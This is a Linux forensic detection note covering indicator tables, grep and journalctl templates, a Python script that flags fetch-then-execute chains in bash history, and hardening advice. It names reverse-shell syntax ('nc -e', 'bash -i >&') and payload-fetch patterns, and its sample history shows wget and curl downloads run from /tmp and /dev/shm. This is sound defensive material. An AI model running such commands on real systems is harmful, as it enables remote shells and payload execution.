This note documents detection patterns related to suspicious command execution on Linux systems.
Direct Indicators
| Artifact | String / Signal | Detection Use | Forensic Value | Notes |
|---|---|---|---|---|
| bash history | curl http | Payload retrieval | Critical | Common staging |
| bash history | wget http | Remote download | Critical | Payload acquisition |
| bash history | chmod +x | Execution prep | High | Often follows download |
| bash history | ./payload | Local execution | Critical | Direct payload run |
| bash history | nc -e | Reverse shell | Critical | Classic shell launch |
| bash history | bash -i >& | Reverse shell | Critical | Common shell syntax |
| bash history | python -c | Inline payload | High | Interpreter abuse |
| bash history | perl -e | Inline payload | High | GTFOBins pattern |
| bash history | socat | Tunnel or shell | High | Advanced operator usage |
| bash history | base64 -d | Payload decode | High | Obfuscation step |
Indirect Indicators
| Indicator | What To Look For | Forensic Value | Notes |
|---|---|---|---|
| Download followed by execute | curl/wget then chmod/run | Critical | Classic intrusion flow |
| Encoded commands | base64 / hex decode | High | Obfuscation |
| Interpreter chain | python → bash → nc | Critical | Multi-stage payload |
| Temporary path execution | /tmp, /dev/shm | Critical | Adversary staging |
| Rare admin commands at odd times | Unexpected root actions | High | Suspicious operator behavior |
Common Tools
| Tool | Usage |
|---|---|
| curl | Payload retrieval |
| wget | Remote fetch |
| nc | Reverse shell |
| socat | Tunnel / shell |
| python | Inline execution |
| perl | Inline execution |
| bash | Reverse shell |
| openssl | Encoded payload handling |
Relevant Artifacts
- /home/*/.bash_history
- /root/.bash_history
- /var/log/auth.log
- journalctl
- /tmp
- /dev/shm
- shell startup files
- downloaded payload files
MITRE ATT&CK References
- T1059 Command and Scripting Interpreter
- T1105 Ingress Tool Transfer
- T1059.004 Unix Shell
Decision Tree
- Was a suspicious command executed?
  - Did it fetch external content?
  - Did execution follow?
- Identify chmod / interpreter use.
- Pivot:
  - downloaded file
  - temp path
  - outbound connection
- Confirm malicious chain:
  - reconstruct command sequence.
Example Detection Templates
Grep
grep -Ei "curl |wget |chmod \+x|nc -e|bash -i|python -c|perl -e|base64 -d|socat" /home/*/.bash_history /root/.bash_history 2>/dev/null
Journalctl
journalctl | grep -Ei "\b(curl|wget|python|perl|bash|nc|socat)\b"
Auth Correlation
grep "Accepted" /var/log/auth.log
Temp Execution
find /tmp /dev/shm -type f -executable 2>/dev/null
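The grep templates above flag single strings; the "download followed by execute" row of the indirect-indicator table and the decision tree describe a sequence. The following script is an added example (not part of the original note) that walks a bash_history in order and reports fetch -> prep -> exec chains, tagging those staged in /tmp or /dev/shm. The stage names and the sample history are constructed for this example.

```python
import re

# Stage patterns built from the direct-indicator strings in the table above.
# The stage labels (fetch/prep/exec/temp) are this example's own naming.
STAGES = {
    "fetch": re.compile(r"\b(curl|wget)\b.*\bhttps?://", re.I),
    "prep":  re.compile(r"\bchmod\s+\+x\b|\bbase64\s+-d\b", re.I),
    # exec: a ./ or temp-path program in command position, or a known
    # interpreter / shell-launch pattern anywhere on the line
    "exec":  re.compile(r"(^|[;&|]\s*)(\./|/tmp/|/dev/shm/)\S+"
                        r"|\bnc\s+-e\b|\bbash\s+-i\s*>&"
                        r"|\bpython3?\s+-c\b|\bperl\s+-e\b|\bsocat\b", re.I),
    "temp":  re.compile(r"/(tmp|dev/shm)/"),
}

def classify(line):
    """Return the set of stage labels whose pattern matches one history line."""
    return {name for name, rx in STAGES.items() if rx.search(line)}

def find_chains(history, window=5):
    """Report (fetch_line, exec_line, chain) for every execution that lands
    within `window` commands of the most recent fetch: the decision tree's
    'did it fetch external content, did execution follow' test."""
    findings, last_fetch, prepped = [], None, False
    for n, line in enumerate(history, 1):
        st = classify(line)
        if "fetch" in st:
            last_fetch, prepped = (n, "temp" in st), False
        elif "prep" in st:
            prepped = True
        if "exec" in st and last_fetch and n - last_fetch[0] <= window:
            chain = ["fetch"] + (["prep"] if prepped else []) + ["exec"]
            if "temp" in st or last_fetch[1]:
                chain.append("temp")   # staged in /tmp or /dev/shm
            findings.append((last_fetch[0], n, chain))
            last_fetch, prepped = None, False   # one report per fetch
    return findings

# Constructed bash_history excerpt (not real data; TEST-NET addresses).
SAMPLE = """ls -la
cd /var/www
wget http://203.0.113.5/update.sh -O /tmp/update.sh
chmod +x /tmp/update.sh
/tmp/update.sh
git pull
curl http://198.51.100.7/x -o /dev/shm/x
./x
echo aGVsbG8= | base64 -d""".splitlines()

if __name__ == "__main__":
    for fetch_line, exec_line, chain in find_chains(SAMPLE):
        print(f"lines {fetch_line}-{exec_line}: {' -> '.join(chain)}")
```

Run it against `/home/*/.bash_history` and `/root/.bash_history` by reading each file into a list of lines; the `window` parameter controls how far apart fetch and execution may be before they are no longer linked.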
Mitigation & Hardening
| Control Area | Mitigation | Effectiveness | Notes |
|---|---|---|---|
| Auditd | Capture command execution | Critical | Independent evidence |
| Restrict outbound fetch tools | Limit curl/wget on servers | High | Reduces abuse |
| Temp execution controls | Mount noexec where possible | High | Blocks staging |
| Central logging | Preserve shell evidence | Critical | Supports timeline |
| Alerting | Detect suspicious command strings | High | Fast triage |